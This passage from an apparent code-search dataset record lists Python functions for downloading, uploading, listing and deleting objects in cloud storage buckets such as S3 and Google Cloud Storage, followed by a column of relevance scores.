finish\n results = await asyncio.gather(*tasks)\n # read each chunk of data and write into the global buffer\n for r in results:\n data_buf.write(r)\n r = None # indicate ready for garbage collection\n data_buf.seek(0)\n data = data_buf.read()\n\n except ClientError as e:\n raise IOException(\n \"Could not read from object {} {}\".format(self._path, e)\n )\n except AttributeError as e:\n self._handle_connection_exception(e)\n return data", "def download_file(file_name, bucket_name, object_name=None):\n # If S3 object_name was not specified, use file_name\n if object_name is None:\n object_name = os.path.basename(file_name)\n\n try:\n # Download file from bucket\n response = s3.download_file(Bucket=bucket_name, Key=object_name, Filename=file_name)\n except ClientError as e:\n logging.error(e)\n return False\n return True", "def new_blob(self, blob_name):\n return storage.Blob(blob_name, self.bucket)", "def _do_retrieve(bucket_name, key_path, number_retries=DEFAULT_S3_RETRIES):\n try:\n return 
conn.get_object(Bucket=bucket_name, Key=key_path, ResponseContentType='string')\n except Exception:\n if number_retries > 0:\n print(\"s3_retrieve failed with incomplete read, retrying on %s\" % key_path)\n return _do_retrieve(bucket_name, key_path, number_retries=number_retries - 1)\n raise", "def get_file_s3(bucket, key):\n \n client = boto3.client('s3')\n return client.get_object(Bucket=bucket, Key=key)['Body'].read().decode('utf-8')", "def download(url, bucket_id, key_prefix):\n\n baseFile = '_'.join(url.split('/')[-4:]) #os.path.basename(url)\n\n #move the file to a more uniq path\n os.umask(0002)\n temp_path = \"/tmp/\"\n file = os.path.join(temp_path,baseFile)\n bucket = conn.get_bucket(bucket_id)\n key = bucket.get_key(key_prefix + baseFile, validate=False)\n s3_exists = key.exists()\n file_exists = os.path.isfile(file)\n \n if not file_exists and s3_exists:\n sys.stderr.write(\"Downloading %s from S3\\n\"%url)\n key.get_contents_to_filename(file)\n sys.stderr.write(\"Downloaded %s from S3\\n\"%url)\n elif not file_exists and not s3_exists:\n sys.stderr.write(\"Downloading %s from the web\\n\"%url)\n try:\n req = urllib2.urlopen(url)\n total_size = int(req.info().getheader('Content-Length').strip())\n downloaded = 0\n CHUNK = 256 * 10240\n with open(file, 'wb') as fp:\n while True:\n chunk = req.read(CHUNK)\n downloaded += len(chunk)\n #print math.floor( (downloaded / total_size) * 100 )\n if not chunk: break\n fp.write(chunk)\n except urllib2.HTTPError, e:\n sys.stderr.write(\"HTTP Error: %s %s\\n\"%(e.code , url))\n return False\n except urllib2.URLError, e:\n sys.stderr.write(\"URL Error: %s %s\\n\"%(e.reason , url))\n return False\n sys.stderr.write(\"Downloaded %s from the web\\n\"%url)\n\n if not s3_exists:\n sys.stderr.write(\"Uploading %s to S3\\n\"%url)\n key.set_contents_from_filename(file)\n\n sys.stderr.write(\"File ready: %s\\n\"%url)\n return file", "def delete_blob(blob_name):\n # bucket_name = \"your-bucket-name\"\n # blob_name = \"your-object-name\"\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(blob_name)\n blob.delete()\n print('Blob {} deleted.'.format(blob_name))", "def list_blobs(bucket_name):\n storage_client = storage.Client()\n bucket = storage_client.get_bucket(bucket_name)\n\n blobs = bucket.list_blobs()\n list_blobs = [blob.public_url for blob in blobs]\n return list_blobs", "async def _download(self) -> None:\n\n # do request\n async with aiohttp.ClientSession() as session:\n async with session.get(self.url, auth=self._auth, timeout=self._timeout) as response:\n # check response\n if response.status == 200:\n # get data and return it\n self._buffer = await response.read()\n elif response.status == 401:\n log.error(\"Wrong credentials for downloading file.\")\n raise FileNotFoundError\n else:\n log.error(\"Could not download file from filecache.\")\n raise FileNotFoundError", "def _torrent_for_blob(blob, is_public):\n # Make sure the storage has a size.\n if not blob.compressed_size:\n abort(404)\n\n # Lookup the torrent information for the storage.\n torrent_info = registry_model.get_torrent_info(blob)\n if torrent_info is None:\n abort(404)\n\n # Lookup the webseed path for the storage.\n webseed = storage.get_direct_download_url(\n blob.placements, blob.storage_path, expires_in=app.config[\"BITTORRENT_WEBSEED_LIFETIME\"]\n )\n if webseed is None:\n # We cannot support webseeds for storages that cannot provide direct downloads.\n exact_abort(501, \"Storage engine does not support 
seeding.\")\n\n # Load the config for building torrents.\n torrent_config = TorrentConfiguration.from_app_config(instance_keys, app.config)\n\n # Build the filename for the torrent.\n if is_public:\n name = public_torrent_filename(blob.uuid)\n else:\n user = get_authenticated_user()\n if not user:\n abort(403)\n\n name = per_user_torrent_filename(torrent_config, user.uuid, blob.uuid)\n\n # Return the torrent file.\n torrent_file = make_torrent(\n torrent_config,\n name,\n webseed,\n blob.compressed_size,\n torrent_info.piece_length,\n torrent_info.pieces,\n )\n\n headers = {\n \"Content-Type\": \"application/x-bittorrent\",\n \"Content-Disposition\": \"attachment; filename={0}.torrent\".format(name),\n }\n\n return make_response(torrent_file, 200, headers)", "def fetch(self, url) -> bytes:\n buffer = self.download(url)\n zfs = ZipFileSystem(buffer, \"r\")\n return zfs.open(zfs.glob(\"*\")[0]).read()", "def download_file_from_icos(icos_obj, bucket: str, local_file_name: str, key: str) -> None:\r\n try:\r\n icos_obj.download_file(Bucket=bucket, Key=key, Filename=local_file_name)\r\n except Exception as e:\r\n print(Exception, e)\r\n else:\r\n print('File `{}` downloaded from ICOS and saved locally as `{}`.'.format(key, local_file_name))", "def list_blobs(bucket):\n bucket = default_bucket if bucket is None else bucket\n bucket_name = bucket if isinstance(bucket, str) else bucket.name\n blobs = gcs.list_blobs(bucket_name)\n return blobs", "def download(self, key, filename):\n self.resource.Bucket(self.bucket).download_file(key, filename)\n return filename", "def download_chain(s3_path, local_path, bucket_name='lwr-inverse-us-east'):\n s3 = boto3.resource(\"s3\")\n lwr_AIES = s3.Bucket(bucket_name)\n try:\n lwr_AIES.download_file(Key=s3_path, Filename=local_path)\n print(\"Download successful\")\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == \"404\":\n print(\"The object does not exist.\")\n else:\n raise", "def list_blobs(bucket_name):\n storage_client = storage.Client()\n\n # Note: Client.list_blobs requires at least package version 1.17.0.\n blobs = storage_client.list_blobs(bucket_name)\n\n return blobs", "def upload_to_bucket(blob_name, file, bucket_name):\n\n # Explicitly use service account credentials by specifying the private key\n # file.\n storage_client = storage.Client.from_service_account_json('creds.json')\n\n bucket = storage_client.get_bucket(bucket_name)\n blob = bucket.blob(blob_name)\n blob.upload_from_file(file)\n\n # returns a public url\n return blob.public_url", "def get_file_download(self, bucket_id, file_id):\n\n \n path = '/storage/buckets/{bucketId}/files/{fileId}/download'\n params = {}\n if bucket_id is None:\n raise AppwriteException('Missing required parameter: \"bucket_id\"')\n\n if file_id is None:\n raise AppwriteException('Missing required parameter: \"file_id\"')\n\n path = path.replace('{bucketId}', bucket_id)\n path = path.replace('{fileId}', file_id)\n\n\n return self.client.call('get', path, {\n 'content-type': 'application/json',\n }, params)", "def download_from_s3(self, filename: str, filename_output: Optional[str] = None) -> str:\n if self.aws_access_key_id is None:\n raise Exception(\n 'To use `download_from_s3` you need to pass '\n '`aws_access_key_id` and '\n '`aws_secret_access_key`'\n )\n\n s3 = boto3.client('s3',\n aws_access_key_id=self.aws_access_key_id,\n aws_secret_access_key=self.aws_secret_access_key)\n\n # Progress bar\n meta_data = s3.head_object(Bucket=self.bucket_name, Key=filename)\n size = 
int(meta_data.get('ContentLength', 0))\n progress_bar = self._progress(size)\n\n # Downloading file\n s3.download_file(self.bucket_name, filename,\n filename if filename_output is None else filename_output,\n Callback=progress_bar)", "def download(self, bucket_name, key_name, fname):\n dname = os.path.dirname(fname)\n if dname and not os.path.exists(dname):\n os.makedirs(dname)\n bucket = self.s3_.get_bucket(bucket_name)\n key = bucket.get_key(key_name)\n return key.get_contents_to_filename(fname)", "def fetch(iid):\n if AWS_CLIENT_CONFIG and BUCKET_NAME:\n try:\n s3 = boto3.resource('s3', **AWS_CLIENT_CONFIG)\n obj = s3.Bucket(BUCKET_NAME).Object(iid).get()\n if obj:\n return obj.get('Body')\n except botocore.exceptions.ClientError as e:\n logger.error(e)\n else:\n # get locally from temp dir (tests, local development)\n return get_temp_file(iid)\n return None", "def fetch_and_extract(self, filename):\n # type: (Text) -> None\n\n with io.open(filename, 'wb') as f:\n self.bucket.download_fileobj(filename, f)\n with tarfile.open(filename, \"r:gz\") as tar:\n tar.extractall(self.data_dir)", "def get_object(self, container_name, object_name, download_path):\n obj = self.client.get_object(container_name, object_name)\n with open(download_path + object_name, 'w') as test_file:\n test_file.write(obj[1])\n return True", "def _download(self):\n self._system.download_file(\"http://curl.haxx.se/download/\" + self._tar_name)", "def download(handle):\n storage = get_storage()\n # FIXME: 404 if not found or invalid?\n return storage.route(handle)", "def get_remote_bytes(file_url) -> io.BytesIO:\n result = urlfetch.fetch(file_url)\n return io.BytesIO(result.content)" ]
[ "0.8135342", "0.8125911", "0.78897315", "0.7834108", "0.77213085", "0.77190185", "0.7650273", "0.7502587", "0.7473543", "0.7457528", "0.73454875", "0.7343923", "0.7278197", "0.72137046", "0.71286523", "0.708186", "0.70657223", "0.6937438", "0.6928341", "0.6895048", "0.6828916", "0.6771264", "0.65662736", "0.65052044", "0.6439699", "0.64299065", "0.64165443", "0.64096147", "0.6397792", "0.63941276", "0.6387207", "0.63418454", "0.63155097", "0.6271182", "0.6262031", "0.62416875", "0.62064576", "0.61968625", "0.615706", "0.6153955", "0.61239", "0.6112361", "0.609456", "0.60913855", "0.6089229", "0.60711336", "0.60594225", "0.6041942", "0.6041942", "0.60041636", "0.6000635", "0.599157", "0.5967848", "0.5921954", "0.59100556", "0.58937657", "0.5890353", "0.5889838", "0.5866992", "0.5866484", "0.58520347", "0.584858", "0.58248377", "0.5798647", "0.5765319", "0.5751928", "0.5750818", "0.5738986", "0.56954867", "0.5694998", "0.56945753", "0.5689315", "0.5688384", "0.56800324", "0.56714934", "0.5670415", "0.5670412", "0.56662875", "0.56604934", "0.5657895", "0.5651305", "0.5647332", "0.5645261", "0.56373215", "0.56352055", "0.56172353", "0.56161845", "0.5615064", "0.56118864", "0.56056833", "0.56045973", "0.5587712", "0.55865866", "0.55470014", "0.5544278", "0.5541974", "0.5538803", "0.5535373", "0.55339414", "0.55260605" ]
0.7573154
7
Computes the Hamming distance for sequences in seqs_mat indicated by pairs of indices.
def nb_vector_hamming_distance(indices, seqs_mat, seqs_L, check_lengths=True):
    return _nb_vector_hamming_distance(indices, seqs_mat, seqs_L, check_lengths)
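A minimal standalone sketch of the same computation (added for illustration; it is not part of this dataset record, and the alphabet encoding, example sequences, and helper names below are assumptions rather than the library's own API): integer-encode equal-length sequences into a seqs_mat-style array, then compute the Hamming distance for each index pair with plain NumPy.

import numpy as np

# Illustrative sketch only: the encoding and toy sequences are assumptions;
# the real library builds seqs_mat/seqs_L with its own helper functions.
seqs = ["CASSLGTDTQYF", "CASSPGTDTQYF", "CASSLGADTQYF"]  # all the same length
alphabet = {aa: i for i, aa in enumerate(sorted(set("".join(seqs))))}
seqs_mat = np.array([[alphabet[aa] for aa in s] for s in seqs], dtype=np.int8)
seqs_L = np.array([len(s) for s in seqs], dtype=np.int64)

# All unordered pairs of sequence indices, shape (n_pairs, 2)
indices = np.array([[i, j] for i in range(len(seqs)) for j in range(i + 1, len(seqs))])

# Hamming distance per pair: count mismatching positions. This is valid here
# because every pair has matching lengths, the condition check_lengths guards.
dist = (seqs_mat[indices[:, 0]] != seqs_mat[indices[:, 1]]).sum(axis=1)
print(dist)  # -> [1 1 2] for the toy sequences above

Judging by the nb.prange and nb.int_ calls in the related snippets below, the wrapped _nb_vector_hamming_distance kernel is numba-compiled, which is why sequences are pre-encoded as integer matrices rather than compared as Python strings.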
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def hamming_distance(s1, s2):\n assert(len(s1) == len(s2))\n return np.sum([1 if c1 != c2 else 0 for c1, c2 in zip(s1, s2)])", "def hamming_distance(s1, s2):\n if len(s1) != len(s2):\n raise ValueError(\"Undefined for sequences of unequal lenght.\")\n return sum(ch1 != ch2 for ch1, ch2 in zip(s1, s2))", "def hamming_dist(seq1, seq2):\n diffs = 0\n length = 0\n for x, y in zip(str(seq1), str(seq2)):\n if x == '-' or y == '-':\n continue\n elif x != y:\n diffs += 1\n length += 1\n try:\n return float(diffs) / length\n except:\n return 0.5", "def hamming_distance(s1, s2):\n return sum(c1 != c2 for c1, c2 in zip(s1, s2))", "def hamming_distance(s1, s2):\n assert len(s1)==len(s2), \",\".join((s1, s2))\n s1 = np.array(s1.upper(), dtype=\"c\")\n s2 = np.array(s2.upper(), dtype=\"c\")\n return np.sum(s1 != s2)", "def hamming_distance(x1: np.ndarray, x2: np.ndarray) -> int:\n assert isinstance(x1, np.ndarray) and isinstance(x2, np.ndarray)\n return (x1 != x2).sum()", "def hamming_distance(words: Iterator[str], vocabulary: Dict[str, int]):\n\n for word in words:\n distances = []\n suggestions = []\n vocab_list = list(vocabulary)\n for (i,vocab) in enumerate(vocab_list):\n if len(vocab) == len(word):\n distances.append(hamming(word, vocab))\n else:\n distances.append(120)\n \n idx = np.array(distances).argsort()[:5]\n \n for i in range(5):\n for j in range(i+1,5):\n if distances[idx[i]] == distances[idx[j]]:\n if vocabulary.get(vocab_list[idx[i]]) < vocabulary.get(vocab_list[idx[j]]):\n temp = idx[i] \n idx[i] = idx[j]\n idx[j] = temp \n\n for i in idx:\n suggestions.append(vocab_list[i])\n\n output(\"{misspelled}\\t{corrections}\".format(\n misspelled=word,\n corrections=\"\\t\".join(suggestions)\n )) # may cause IO bottleneck", "def hamming_distance(s1, s2):\n if len(s1) > len(s2):\n s2 = s2.ljust(len(s1))\n else:\n s1 = s1.ljust(len(s2))\n\n return sum(el1 != el2 for el1, el2 in zip(s1, s2))", "def hamming_distance(a, b):\n return np.count_nonzero(a != b)", "def _nb_vector_editdistance(indices, seqs_mat, seqs_L, distance_matrix=identity_nb_distance_matrix, gap_penalty=1):\n assert seqs_mat.shape[0] == seqs_L.shape[0]\n mx_L = nb.int_(np.max(seqs_L))\n\n dist = np.zeros(indices.shape[0], dtype=np.int16)\n \n \"\"\"As long as ldmat is big enough to accomodate the largest sequence\n its OK to only use part of it for the smaller sequences\n NOTE that to create a 2D array it must be created 1D and reshaped\"\"\"\n ldmat = np.zeros(mx_L * mx_L, dtype=np.int16).reshape((mx_L, mx_L))\n for ind_i in nb.prange(indices.shape[0]):\n query_i = indices[ind_i, 0]\n seq_i = indices[ind_i, 1]\n \n q_L = seqs_L[query_i]\n s_L = seqs_L[seq_i]\n if q_L == s_L:\n \"\"\"No gaps: substitution distance\n This will make it differ from a strict edit-distance since\n the optimal edit-distance may insert same number of gaps in both sequences\"\"\"\n #tmp_dist = 0\n for i in range(q_L):\n dist[ind_i] += distance_matrix[seqs_mat[query_i, i], seqs_mat[seq_i, i]]\n #dist[ind_i] = tmp_dist\n continue\n \n \"\"\"Do not need to re-zero each time\"\"\"\n # ldmat = np.zeros((q_L, s_L), dtype=np.int16)\n for row in range(1, q_L):\n ldmat[row, 0] = row * gap_penalty\n\n for col in range(1, s_L):\n ldmat[0, col] = col * gap_penalty\n \n for col in range(1, s_L):\n for row in range(1, q_L):\n ldmat[row, col] = min(ldmat[row-1, col] + gap_penalty,\n ldmat[row, col-1] + gap_penalty,\n ldmat[row-1, col-1] + distance_matrix[seqs_mat[query_i, row-1], seqs_mat[seq_i, col-1]]) # substitution\n dist[ind_i] = ldmat[row, col]\n return dist", 
"def hamming_dist(s1, s2):\n\n if s1 is None or s2 is None:\n return np.NaN\n if pd.isnull(s1) or pd.isnull(s2):\n return np.NaN\n\n # Create the similarity measure object\n measure = sm.HammingDistance()\n\n s1 = gh.convert_to_str_unicode(s1)\n s2 = gh.convert_to_str_unicode(s2)\n\n\n # Call the function to compute the distance\n return measure.get_raw_score(s1, s2)", "def hamming_distance(cs):\n d = 0.0\n end = len(cs) - 1\n for idx in range(end):\n s1 = cs[idx]\n s2 = cs[idx + 1]\n assert len(s1) == len(s2)\n s1_bits = ''.join('{:b}'.format(c).zfill(8) for c in s1)\n s2_bits = ''.join('{:b}'.format(c).zfill(8) for c in s2)\n d += sum(c1 != c2 for c1, c2 in zip(s1_bits, s2_bits))\n return d / end", "def hamming_distance(a, b):\n assert len(a) == len(b)\n dist = sum(item_a != item_b for item_a, item_b in zip(a, b))\n return dist", "def _PD_hamming(alignA, alignB, subst, bySite, withinA, ignoreGaps=True):\n L = len(alignA.iloc[0])\n gapCode = AA2CODE['-']\n\n \"\"\"Convert alignments into integer arrays first to speed comparisons\"\"\"\n matA = np.zeros((len(alignA), L))\n for seqi, s in enumerate(alignA):\n matA[seqi,:] = _seq2vec(s)\n if not withinA:\n matB = np.zeros((len(alignB), L))\n for seqi, s in enumerate(alignB):\n matB[seqi,:] = _seq2vec(s)\n\n \"\"\"Dist will be 1 where equal, 0 where not and nan if one is a gap\"\"\"\n if withinA:\n dist=np.zeros((int(scipy.special.comb(len(alignA), 2)), L))\n allPairs = itertools.combinations(np.arange(len(alignA)), 2)\n for j, (seqi1, seqi2) in enumerate(allPairs):\n dist[j,:] = matA[seqi1,:]!=matA[seqi2,:]\n if ignoreGaps:\n gapInd = (matA[seqi1,:]==gapCode) | (matA[seqi2,:]==gapCode)\n dist[j, gapInd] = np.nan\n else:\n dist=np.zeros((len(alignA)*len(alignB), L))\n allPairs = itertools.product(np.arange(len(alignA)), np.arange(len(alignB)))\n for j, (seqiA, seqiB) in enumerate(allPairs):\n dist[j,:] = matA[seqiA,:]!=matB[seqiB,:]\n if ignoreGaps:\n gapInd = (matA[seqiA,:]==gapCode) | (matB[seqiB,:]==gapCode)\n dist[j, gapInd] = np.nan\n\n if not bySite:\n dist=np.nanmean(dist, axis=1)\n return np.nanmean(dist, axis=0)", "def hammingDistance(s1 = \"\", s2 = \"\"):\n # if len(s1) != len(s2):\n # raise ValueError(\"Undefined for sequences of unequal length\")\n return sum(bool(ord(ch1) - ord(ch2)) for ch1, ch2 in zip(s1, s2))", "def hamming_dist(self):\r\n distance = 0\r\n distance = abs(len(self.s1) - len(self.s2))\r\n distance += sum(i1 != i2 for i1,i2 in zip(self.s2,self.s1))\r\n return distance", "def hamming_distance(lhs,rhs):\n return len([(x,y) for x,y in zip(lhs,rhs) if x !=y])", "def distance_matrix(sequences, substitution_mat):\n distance_mat = numpy.empty((len(sequences), len(sequences)), dtype='float')\n\n print(\"Building distance matrix\")\n # Get similarity score\n for i, seqA in enumerate(sequences):\n sys.stdout.write(\"\\r%.f%%\" % (float(i+1)/len(sequences)*100))\n sys.stdout.flush()\n for j, seqB in enumerate(sequences[i:], start=i):\n score = substitution_score(substitution_mat, seqA, seqB)\n distance_mat[i, j] = score\n distance_mat[j, i] = score\n print(\"\")\n # Set equal the diagonal\n diag_mini = numpy.min(distance_mat.diagonal())\n for i in range(len(sequences)):\n distance_mat[i, i] = diag_mini\n # Convert similarity score into a distance\n mini = numpy.min(distance_mat)\n maxi = numpy.max(distance_mat)\n return 1 - (distance_mat + abs(mini))/(maxi - mini)", "def hamming_dist(a_b, b_b):\n return sum(bin(a_b[n] ^ b_b[n]).count('1') for n in range(len(a_b)))", "def hamdist(inp):\n\treturn sum(c1 != c2 for c1, c2 in 
itertools.izip(inp[0],inp[1]))", "def get_all_distances(cls, indices, dist_mat):\n distances = []\n for i, j in combinations(indices, 2):\n distances.append(cls.get_dist(dist_mat, i, j))\n return distances", "def __hamming_distance(s1, s2):\n if len(s1) != len(s2):\n raise ValueError(\"Undefined for sequences of unequal length\")\n return sum(el1 != el2 for el1, el2 in zip(s1, s2))", "def hamming_dist(v1, v2):\r\n edits = (v1 != v2)\r\n return edits.sum()", "def hamming_dist(gene_1, gene_2):\n ham_dist = 0\n for c1, c2 in zip(gene_1, gene_2):\n if c1 != c2:\n ham_dist += 1\n return ham_dist", "def countingPointMutations(seq1, seq2):\n seqLength = len(list(seq1))\n \n hammingDistance=0;\n for i in range(0,seqLength):\n if list(seq1)[i]!=list(seq2)[i]:\n hammingDistance = hammingDistance+1;\n return hammingDistance", "def hamming(seq1, seq2) -> int:\n if type(seq1) is SeqRecord:\n return hamming(seq1.seq, seq2)\n elif type(seq2) is SeqRecord:\n return hamming(seq1, seq2.seq)\n elif (type(seq1) is str or type(seq1) is Seq) and (type(seq2) is Seq or type(seq2) is str):\n if len(seq1) != len(seq2):\n raise ValueError('The sequences are of different lengths!')\n else:\n distance = 0\n for i in range(len(seq1)):\n if seq1[i] != seq2[i]:\n distance += 1\n return distance\n else:\n raise TypeError('Wrong type.')", "def hard_example_mining(dist_mat, is_pos, is_neg):\n\n assert len(dist_mat.size()) == 2\n\n # `dist_ap` means distance(anchor, positive)\n # both `dist_ap` and `relative_p_inds` with shape [N]\n dist_ap, _ = torch.max(dist_mat * is_pos, dim=1)\n # `dist_an` means distance(anchor, negative)\n # both `dist_an` and `relative_n_inds` with shape [N]\n inf = dist_mat.max() + 1\n dist_an, _ = torch.min(dist_mat * is_neg + is_pos * inf, dim=1)\n\n return dist_ap, dist_an", "def sim_mat(fc7_feats):\n print(\"Something\")\n t = time.time()\n pdist_ = spatial.distance.pdist(fc7_feats)\n print('Created distance matrix' + ' ' + str(time.time() - t) + ' sec')\n\n t = time.time()\n dist_mat = spatial.distance.squareform(pdist_)\n print('Created square distance matrix' + ' ' + str(time.time() - t) + ' sec')\n del pdist_\n\n t = time.time()\n sigmas = np.sort(dist_mat, axis=1)[:, 7] + 1e-16\n matrice_prodotti_sigma = np.dot(sigmas[:, np.newaxis], sigmas[np.newaxis, :])\n print('Generated Sigmas' + ' ' + str(time.time() - t) + ' sec')\n\n t = time.time()\n dist_mat /= -matrice_prodotti_sigma\n print('Computed dists/-sigmas' + ' ' + str(time.time() - t) + ' sec')\n\n del matrice_prodotti_sigma\n\n t = time.time()\n W = np.exp(dist_mat, dist_mat)\n # W = np.exp(-(dist_mat / matrice_prodotti_sigma))\n np.fill_diagonal(W, 0.)\n\n # sparsify the matrix\n k = int(np.floor(np.log2(fc7_feats.shape[0])) + 1)\n n = W.shape[0]\n print('Created inplace similarity matrix' + ' ' + str(time.time() - t) + ' sec')\n\n t = time.time()\n for x in W:\n x[np.argpartition(x, n - k)[:(n - k)]] = 0.0\n\n print('Sparsify the matrix' + ' ' + str(time.time() - t) + ' sec')\n\n t = time.time()\n # matrix_S = np.zeros((n, n))\n m1 = W[np.triu_indices(n, k=1)]\n m2 = W.T[np.triu_indices(n, k=1)]\n\n W = spatial.distance.squareform(np.maximum(m1, m2))\n print('Symmetrized the similarity matrix' + ' ' + str(time.time() - t) + ' sec')\n\n return W", "def get_adjacent_distances(dist_matrix_header,\r\n dist_matrix,\r\n sample_ids,\r\n strict=False):\r\n filtered_idx = []\r\n filtered_sids = []\r\n for sid in sample_ids:\r\n try:\r\n idx = dist_matrix_header.index(sid)\r\n except ValueError:\r\n if strict:\r\n raise ValueError(\r\n \"Sample 
ID (%s) is not present in distance matrix\" %\r\n sid)\r\n else:\r\n pass\r\n else:\r\n filtered_idx.append(idx)\r\n filtered_sids.append(sid)\r\n\r\n if len(filtered_idx) < 2:\r\n raise ValueError(\"At least two of your sample_ids must be present in the\"\r\n \" distance matrix. %d are present.\" % len(filtered_idx))\r\n\r\n distance_results = []\r\n header_results = []\r\n for i in range(len(filtered_idx) - 1):\r\n distance_results.append(\r\n dist_matrix[filtered_idx[i]][filtered_idx[i + 1]])\r\n header_results.append(\r\n (filtered_sids[i], filtered_sids[i + 1]))\r\n return distance_results, header_results", "def calculate_dist_mat(embeddings: np.ndarray, norm: int) -> np.ndarray:\n kwargs = {'p': norm}\n condensed_dist = pdist(embeddings, metric='minkowski', **kwargs)\n dist_mat = squareform(condensed_dist)\n return dist_mat", "def pairwise_cosine(mat):\n def cosine_similarity(a, b):\n return (a * b).sum() / (np.linalg.norm(a) * np.linalg.norm(b))\n\n n = len(mat)\n dist_mat = np.zeros((n, n))\n for i in range(n):\n for j in range(i + 1, n):\n dist = cosine_similarity(mat[i], mat[j])\n dist_mat[i, j] = dist\n dist_mat[j, i] = dist\n\n dist_mat[np.isnan(dist_mat)] = 0\n\n return dist_mat", "def hamming_distance(v_est, v_true):\n assert(v_est.shape == v_true.shape)\n\n return 1 / len(v_est) * np.sum(v_est != v_true)", "def hamming_sim(s1, s2):\n\n if s1 is None or s2 is None:\n return np.NaN\n if pd.isnull(s1) or pd.isnull(s2):\n return np.NaN\n\n # Create the similarity measure object\n measure = sm.HammingDistance()\n\n s1 = gh.convert_to_str_unicode(s1)\n s2 = gh.convert_to_str_unicode(s2)\n\n # Call the function to compute the similarity score.\n return measure.get_sim_score(s1, s2)", "def hamming(a, b):\n len1 = len(a)\n len2 = len(b)\n overlap = min(len1, len2)\n difference = abs(len1 - len2)\n for x in range(overlap):\n if a[x] != b[x]:\n difference += 1\n\n return difference", "def gen_dist(genes):\n\n # First generate an NxNxB matrix that has False where\n # i and j individuals have the same kth gene and True\n # otherwise (XOR operation). 
Then sum along\n # the genome axis to get distance\n return np.sum(genes[:,None,:] ^ genes, axis=-1)", "def hammingDist(x, y):\n hd = 0\n for ch1, ch2 in zip(x, y):\n if ch1 != ch2:\n hd += 1\n return hd", "def hamming(s1, s2):\n assert len(s1) == len(s2)\n return sum(c1 != c2 for c1, c2 in zip(s1, s2))", "def hamming(s1, s2):\n weight = abs(len(s1)-len(s2))\n if len(s1) < len(s2):\n s1, s2 = s2, s1\n for i in range(len(s2)):\n weight += not s1[i] == s2[i]\n return weight", "def get_mismatch_matrix(k,m):\n words = get_words(k)\n N = len(words)\n\n mismatch_matrix = np.zeros((N, N))\n for i in range(N):\n for j in range(i, N):\n if Levenshtein.hamming(words[i], words[j]) <= m:\n mismatch_matrix[i,j] = 1/2\n mismatch_matrix[j,i] = 1/2\n\n return mismatch_matrix", "def sim_adj_matrix(sents, sim_hash, min_sim=0.1):\n # return [[1 if sim_hash[s1][s2] > min_sim else 0\n # for s2 in sents]\n # for s1 in sents]\n\n return np.array([[sim_hash[s1][s2] for s2 in sents] for s1 in sents])", "def reduce_mtx(distmat, indices):\r\n return distmat.take(indices, 0).take(indices, 1)", "def distance_mentions(m_i, m_j):\n return abs(m_i.id - m_j.id)", "def compute_distmat(data, distfn):\n out = np.zeros((data.shape[0], data.shape[0]))\n for i in xrange(data.shape[0]):\n for j in xrange(data.shape[0]):\n if i == j: continue\n out[i,j] = distfn(data[i,:,:], data[j,:,:])\n return out", "def pairwise(self, arr_x, mat_y):\n n, h = mat_y.shape\n x = np.tile(arr_x, (n, 1)) # become nxh\n x_big = x >= mat_y\n difference = x-mat_y\n big_sum = (x_big * difference).sum(axis=1) # n\n small_sum = ((1-x_big) * (-difference)).sum(axis=1)\n sum_ = (big_sum ** self.p + small_sum ** self.p)\n dist = sum_ ** (1/self.p)\n\n if self.normalize:\n stack = np.stack((x, mat_y, difference), 0)\n stack = np.abs(stack)\n m = stack.max(0).sum(-1)\n dist /= m\n return dist", "def similarity_matrix(feat_mat):\n sim_mat = cosine_similarity(feat_mat)\n np.fill_diagonal(sim_mat, 0)\n return sim_mat", "def hamming_distance(StringA,StringB):\n if len(StringA) != String(B):\n raise ValueError(\"The length of sequences are not equal!\")\n return sum(x !=y for (x,y) in zip(StringA,StringB))", "def manhattan_distances(X, Y):\r\n D = np.zeros((X.shape[0],Y.shape[0]))\r\n \r\n for X_idx in range(X.shape[0]):\r\n for Y_idx in range(Y.shape[0]): \r\n \r\n D[X_idx,Y_idx] = np.sum(np.abs(X[X_idx,:] - Y[Y_idx,:]))\r\n \r\n return D", "def dist_manhattan(datamtx, strict=True):\n if strict:\n if not all(isfinite(datamtx)):\n raise ValueError(\"non finite number in input matrix\")\n if rank(datamtx) != 2:\n raise ValueError(\"input matrix not 2D\")\n numrows, numcols = shape(datamtx)\n else:\n try:\n numrows, numcols = shape(datamtx)\n except ValueError:\n return zeros((0,0),'d')\n\n if numrows == 0 or numcols == 0:\n return zeros((0,0),'d')\n dists = zeros((numrows,numrows),'d')\n for i in range(numrows):\n r1 = datamtx[i] # cache here\n for j in range(i):\n dists[i,j] = dists[j,i] = sum(abs(r1 - datamtx[j]))\n \n return dists", "def pair_hmm_align_unaligned_seqs(seqs,moltype,params={}):\n \n seqs = LoadSeqs(data=seqs,moltype=moltype,aligned=False)\n try:\n s1, s2 = seqs.values()\n except ValueError:\n raise ValueError,\\\n \"Pairwise aligning of seqs requires exactly two seqs.\"\n \n try:\n gap_open = params['gap_open']\n except KeyError:\n gap_open = 5\n try:\n gap_extend = params['gap_extend']\n except KeyError:\n gap_extend = 2\n try:\n score_matrix = params['score_matrix']\n except KeyError:\n score_matrix = make_dna_scoring_dict(\\\n 
match=1,transition=-1,transversion=-1)\n \n return global_pairwise(s1,s2,score_matrix,gap_open,gap_extend)", "def manhattan_distance(index1=(), index2=()):\r\n md = 0\r\n for a1, a2 in zip(index1, index2):\r\n md += abs(a1-a2)\r\n return md", "def hard_example_mining(dist_mat, labels, return_inds=False):\n assert len(dist_mat.size()) == 2\n assert dist_mat.size(0) == dist_mat.size(1)\n N = dist_mat.size(0)\n\n is_pos = labels.expand(N, N).eq(labels.expand(N, N).t())\n is_neg = labels.expand(N, N).ne(labels.expand(N, N).t())\n\n dist_ap, relative_p_inds = torch.max(\n dist_mat[is_pos].contiguous().view(N, -1), 1, keepdim=True)\n dist_an, relative_n_inds = torch.min(\n dist_mat[is_neg].contiguous().view(N, -1), 1, keepdim=True)\n\n dist_ap = dist_ap.squeeze(1)\n dist_an = dist_an.squeeze(1)\n\n if return_inds:\n ind = (labels.new().resize_as_(labels)\n .copy_(torch.arange(0, N).long())\n .unsqueeze(0).expand(N, N))\n p_inds = torch.gather(\n ind[is_pos].contiguous().view(N, -1), 1, relative_p_inds.data)\n n_inds = torch.gather(\n ind[is_neg].contiguous().view(N, -1), 1, relative_n_inds.data)\n p_inds = p_inds.squeeze(1)\n n_inds = n_inds.squeeze(1)\n 